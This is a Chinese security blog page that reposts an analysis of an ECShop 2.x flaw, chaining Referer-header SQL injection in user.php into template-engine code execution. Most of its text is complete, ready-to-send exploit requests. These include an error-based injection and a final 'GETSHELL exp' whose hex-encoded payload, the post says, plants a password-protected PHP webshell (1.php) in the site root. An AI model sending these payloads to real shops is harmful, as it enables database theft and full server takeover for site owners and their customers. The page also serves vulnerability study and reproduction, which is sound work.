

<!DOCTYPE html>
<html lang="zh-CN" >



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="前言问题发生在user.php的display函数，模版变量可控，导致注入，配合注入可达到远程代码执行
漏洞分析0x01-SQL注入先看user.php
">
  <meta name="author" content="iceH">
  <meta name="keywords" content="">
  
  <title>ecshop2.x代码执行 - iceH‘Blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.7.2/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"www.360rce.com","root":"/","version":"1.8.11","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>iceH‘Blog</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item dropdown">
              <a class="nav-link dropdown-toggle" target="_self" role="button"
                 data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
                <i class="iconfont icon-books"></i>
                博文
              </a>
              <div class="dropdown-menu" aria-labelledby="navbarDropdown">
                
                  
                  
                  
                  <a class="dropdown-item" href="/archives/">
                    <i class="iconfont icon-archive-fill"></i>
                    归档
                  </a>
                
                  
                  
                  
                  <a class="dropdown-item" href="/categories/">
                    <i class="iconfont icon-category-fill"></i>
                    分类
                  </a>
                
                  
                  
                  
                  <a class="dropdown-item" href="/tags/">
                    <i class="iconfont icon-tags-fill"></i>
                    标签
                  </a>
                
              </div>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item dropdown">
              <a class="nav-link dropdown-toggle" target="_self" role="button"
                 data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
                <i class="iconfont icon-category-fill"></i>
                更多
              </a>
              <div class="dropdown-menu" aria-labelledby="navbarDropdown">
                
                  
                  
                  
                  <a class="dropdown-item" target="_blank" rel="noopener" href="//linux.360rce.com">
                    <i class="iconfont icon-archive-fill"></i>
                    linux
                  </a>
                
                  
                  
                  
                  <a class="dropdown-item" target="_blank" rel="noopener" href="//tools.360rce.com">
                    <i class="iconfont icon-category-fill"></i>
                    tools
                  </a>
                
              </div>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="ecshop2.x代码执行">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2018-09-02 11:42" pubdate>
        2018年9月2日 中午
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      820 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      12
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">ecshop2.x代码执行</h1>
            
            <div class="markdown-body">
              <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>问题发生在user.php的display函数，模版变量可控，导致注入，配合注入可达到远程代码执行</p>
<h2 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h2><h3 id="0x01-SQL注入"><a href="#0x01-SQL注入" class="headerlink" title="0x01-SQL注入"></a>0x01-SQL注入</h3><p>先看user.php</p>
<p><img src="/images/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/20180902_ecshop2.x%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/01.jpg" srcset="/img/loading.gif" lazyload alt="ecshop2.x代码执行"></p>
<span id="more"></span>

<p>$back_act变量来源于HTTP_REFERER，我们可控。</p>
<p>assign函数用于在模版变量里赋值</p>
<p><img src="/images/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/20180902_ecshop2.x%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/02.jpg" srcset="/img/loading.gif" lazyload alt="ecshop2.x代码执行"></p>
<p>再看display函数</p>
<p><img src="/images/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/20180902_ecshop2.x%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/03.jpg" srcset="/img/loading.gif" lazyload alt="ecshop2.x代码执行"></p>
<p><strong>读取user_passport.dwt模版文件内容，显示解析变量后的html内容，用_echash做分割，得到$k然后交给isnert_mod处理，由于_echash是默认的，不是随机生成的，所以$val内容可随意控制。</strong></p>
<p>再看insert_mod函数</p>
<p><img src="/images/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/20180902_ecshop2.x%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/04.jpg" srcset="/img/loading.gif" lazyload alt="ecshop2.x代码执行"></p>
<p>非常关键的一个地方，这里进行了动态调用</p>
<p>$val传入进来用|分割，参数传入进来时需要被序列化</p>
<p>再看include/lib_insert.php中的insert_ads函数</p>
<p><img src="/images/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/20180902_ecshop2.x%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/05.jpg" srcset="/img/loading.gif" lazyload alt="ecshop2.x代码执行"></p>
<p>可以看到这里直接就能注入了</p>
<p>payload:</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs http"><span class="hljs-keyword">GET</span> <span class="hljs-string">/user.php?act=login</span> <span class="hljs-meta">HTTP/1.1</span><br><span class="hljs-attribute">Host</span><span class="hljs-punctuation">: </span>127.0.0.1<br><span class="hljs-attribute">User-Agent</span><span class="hljs-punctuation">: </span>Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0<br><span class="hljs-attribute">Accept</span><span class="hljs-punctuation">: </span>text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br><span class="hljs-attribute">Accept-Language</span><span class="hljs-punctuation">: </span>zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3<br><span class="hljs-attribute">Cookie</span><span class="hljs-punctuation">: </span>PHPSESSID=9odrkfn7munb3vfksdhldob2d0; ECS_ID=1255e244738135e418b742b1c9a60f5486aa4559; ECS[visit_times]=1<br><span class="hljs-attribute">Referer</span><span class="hljs-punctuation">: </span>554fcae493e564ee0dc75bdf2ebf94caads|a:2:&#123;s:3:&quot;num&quot;;s:72:&quot;0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -&quot;;s:2:&quot;id&quot;;i:1;&#125;<br><span class="hljs-attribute">Connection</span><span class="hljs-punctuation">: </span>close<br><span class="hljs-attribute">Upgrade-Insecure-Requests</span><span class="hljs-punctuation">: </span>1<br><span class="hljs-attribute">Cache-Control</span><span class="hljs-punctuation">: </span>max-age=0<br><br><br></code></pre></td></tr></table></figure>

<p><img src="/images/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/20180902_ecshop2.x%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/06.jpg" srcset="/img/loading.gif" lazyload alt="ecshop2.x代码执行"></p>
<h3 id="0x02-代码执行"><a href="#0x02-代码执行" class="headerlink" title="0x02-代码执行"></a>0x02-代码执行</h3><p><img src="/images/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/20180902_ecshop2.x%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/07.jpg" srcset="/img/loading.gif" lazyload alt="ecshop2.x代码执行"></p>
<p>继续看fetch函数</p>
<p><img src="/images/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/20180902_ecshop2.x%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/08.jpg" srcset="/img/loading.gif" lazyload alt="ecshop2.x代码执行"></p>
<p>追踪_eval函数</p>
<p><img src="/images/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/20180902_ecshop2.x%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/09.jpg" srcset="/img/loading.gif" lazyload alt="ecshop2.x代码执行"></p>
<p>$position_style变量来源于数据库中的查询结构</p>
<p><img src="/images/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/20180902_ecshop2.x%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/10.jpg" srcset="/img/loading.gif" lazyload alt="ecshop2.x代码执行"></p>
<p>然后我们继续构造SQL注入，因为这段sql操作 order by部分换行了截断不了 所以需要在id处构造注释来配合num进行union查询</p>
<p><img src="/images/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/20180902_ecshop2.x%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/11.jpg" srcset="/img/loading.gif" lazyload alt="ecshop2.x代码执行"></p>
<p>payload</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">SELECT</span> a.ad_id, a.position_id, a.media_type, a.ad_link, a.ad_code, a.ad_name, p.ad_width, p.ad_height, p.position_style, RAND() <span class="hljs-keyword">AS</span> rnd <span class="hljs-keyword">FROM</span> `ecshop27`.`ecs_ad` <span class="hljs-keyword">AS</span> a <span class="hljs-keyword">LEFT</span> <span class="hljs-keyword">JOIN</span> `ecshop27`.`ecs_ad_position` <span class="hljs-keyword">AS</span> p <span class="hljs-keyword">ON</span> a.position_id <span class="hljs-operator">=</span> p.position_id <span class="hljs-keyword">WHERE</span> enabled <span class="hljs-operator">=</span> <span class="hljs-number">1</span> <span class="hljs-keyword">AND</span> start_time <span class="hljs-operator">&lt;=</span> <span class="hljs-string">&#x27;1535678679&#x27;</span> <span class="hljs-keyword">AND</span> end_time <span class="hljs-operator">&gt;=</span> <span class="hljs-string">&#x27;1535678679&#x27;</span> <span class="hljs-keyword">AND</span> a.position_id <span class="hljs-operator">=</span> <span class="hljs-string">&#x27;&#x27;</span><span class="hljs-comment">/*&#x27; ORDER BY rnd LIMIT */</span> <span class="hljs-keyword">union</span> <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,<span class="hljs-number">2</span>,<span class="hljs-number">3</span>,<span class="hljs-number">4</span>,<span class="hljs-number">5</span>,<span class="hljs-number">6</span>,<span class="hljs-number">7</span>,<span class="hljs-number">8</span>,<span class="hljs-number">9</span>,<span class="hljs-number">10</span><span class="hljs-comment">-- -</span><br></code></pre></td></tr></table></figure>

<p>函数中有一个判断</p>
<p><img src="/images/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/20180902_ecshop2.x%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/12.jpg" srcset="/img/loading.gif" lazyload alt="ecshop2.x代码执行"></p>
<p>我们 id传入’/*</p>
<p>num传入*/ union select 1,0x272f2a,3,4,5,6,7,8,9,10– -就能绕过了</p>
<p><img src="/images/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/20180902_ecshop2.x%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/13.jpg" srcset="/img/loading.gif" lazyload alt="ecshop2.x代码执行"></p>
<p>var_dump一下</p>
<p><img src="/images/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/20180902_ecshop2.x%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/14.jpg" srcset="/img/loading.gif" lazyload alt="ecshop2.x代码执行"></p>
<p><img src="/images/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/20180902_ecshop2.x%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/15.jpg" srcset="/img/loading.gif" lazyload alt="ecshop2.x代码执行"></p>
<p>再看fetch函数,传入的参数被fetch_str函数处理了</p>
<p><img src="/images/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/20180902_ecshop2.x%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/16.jpg" srcset="/img/loading.gif" lazyload alt="ecshop2.x代码执行"></p>
<p>追踪fetch_str函数，这里的字符串处理流程比较复杂</p>
<p><img src="/images/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/20180902_ecshop2.x%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/17.jpg" srcset="/img/loading.gif" lazyload alt="ecshop2.x代码执行"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">return</span> preg_replace(<span class="hljs-string">&quot;/&#123;([^\&#125;\&#123;\n]*)&#125;/e&quot;</span>, <span class="hljs-string">&quot;\$this-&gt;select(&#x27;\\1&#x27;);&quot;</span>, <span class="hljs-variable">$source</span>);<br></code></pre></td></tr></table></figure>

<p>这一行意思是比如$source是xxxx{$asd}xxx,那么经过这行代码处理后就是返回this-&gt;select(‘$asd’)的结果</p>
<p>看看select函数</p>
<p><img src="/images/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/20180902_ecshop2.x%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/18.jpg" srcset="/img/loading.gif" lazyload alt="ecshop2.x代码执行"></p>
<p>第一个字符为$时进入$this-&gt;get_val函数</p>
<p><img src="/images/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/20180902_ecshop2.x%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/19.jpg" srcset="/img/loading.gif" lazyload alt="ecshop2.x代码执行"></p>
<p>我们$val没有.$又进入make_var函数</p>
<p><img src="/images/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/20180902_ecshop2.x%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/20.jpg" srcset="/img/loading.gif" lazyload alt="ecshop2.x代码执行"></p>
<p>最后这里引入单引号从变量中逃逸</p>
<p><img src="/images/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/20180902_ecshop2.x%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/21.jpg" srcset="/img/loading.gif" lazyload alt="ecshop2.x代码执行"></p>
<p>我们要闭合_var所以最终payload是</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">&#123;<span class="hljs-variable">$asd</span><span class="hljs-string">&#x27;];assert(base64_decode(&#x27;</span>ZmlsZV9wdXRfY29udGVudHMoJzEudHh0JywnZ2V0c2hlbGwnKQ==<span class="hljs-string">&#x27;));//&#125;xxx</span><br></code></pre></td></tr></table></figure>

<p>会在网站跟目录生成1.txt 里面内容是getshell</p>
<p><img src="/images/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/20180902_ecshop2.x%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/22.jpg" srcset="/img/loading.gif" lazyload alt="ecshop2.x代码执行"></p>
<p>GETSHELL exp:</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs http"><span class="hljs-keyword">GET</span> <span class="hljs-string">/user.php?act=login</span> <span class="hljs-meta">HTTP/1.1</span><br><span class="hljs-attribute">Host</span><span class="hljs-punctuation">: </span>127.0.0.1<br><span class="hljs-attribute">User-Agent</span><span class="hljs-punctuation">: </span>Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0<br><span class="hljs-attribute">Accept</span><span class="hljs-punctuation">: </span>text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br><span class="hljs-attribute">Accept-Language</span><span class="hljs-punctuation">: </span>zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3<br><span class="hljs-attribute">Cookie</span><span class="hljs-punctuation">: </span>PHPSESSID=9odrkfn7munb3vfksdhldob2d0; ECS_ID=1255e244738135e418b742b1c9a60f5486aa4559; ECS[visit_times]=1<br><span class="hljs-attribute">Referer</span><span class="hljs-punctuation">: </span>554fcae493e564ee0dc75bdf2ebf94caads|a:2:&#123;s:3:&quot;num&quot;;s:280:&quot;*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -&quot;;s:2:&quot;id&quot;;s:3:&quot;&#x27;/*&quot;;&#125;<br><span class="hljs-attribute">Connection</span><span class="hljs-punctuation">: </span>close<br><span class="hljs-attribute">Upgrade-Insecure-Requests</span><span class="hljs-punctuation">: </span>1<br><span class="hljs-attribute">Cache-Control</span><span class="hljs-punctuation">: </span>max-age=0<br><br><br></code></pre></td></tr></table></figure>

<p>会在网站根目录生成1.php 密码是1337</p>
<p>文章转载自:<br><a target="_blank" rel="noopener" href="http://ringk3y.com/2018/08/31/ecshop2-x%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/">http://ringk3y.com/2018/08/31/ecshop2-x%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/</a></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/">学习笔记</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/">漏洞复现</a>
                    
                      <a class="hover-with-bg" href="/tags/Ecshop/">Ecshop</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/p/3f4fbe96">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">SQL注入学习之MYSQL盲注</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/p/7819b580">
                        <span class="hidden-mobile">记一个奇葩的上传点</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->

  <div class="col-lg-7 mx-auto nopadding-x-md">
    <div class="container custom post-custom mx-auto">
      <img src="/img/psb.gif" srcset="/img/loading.gif" lazyload class="rounded mx-auto d-block mt-5" style="width:300px; height:150px;">
    </div>
  </div>


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <span>iceH</span> <i class="iconfont icon-love"></i> <span>一条啥也不会的咸鱼！</span> 
  </div>
  

  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.3/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.1/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.8/dist/clipboard.min.js" ></script>



  <script  src="/js/local-search.js" ></script>






  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.12/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


<!-- hexo injector body_end start -->
    <script src="/js/qipao.js"></script>
    <script src="/js/dianjichuzi.js"></script>
    <script src="/js/jingtaisidai.js"></script>
    
    <link defer rel="stylesheet" href="/css/customize.css">
    <link defer rel="stylesheet" href="/css/gundongtiao.css">
    <link defer rel="stylesheet" href="/css/shubiao.css">
    <link defer rel="stylesheet" href="/css/valine.css">
    <!-- hexo injector body_end end --></body>
</html>
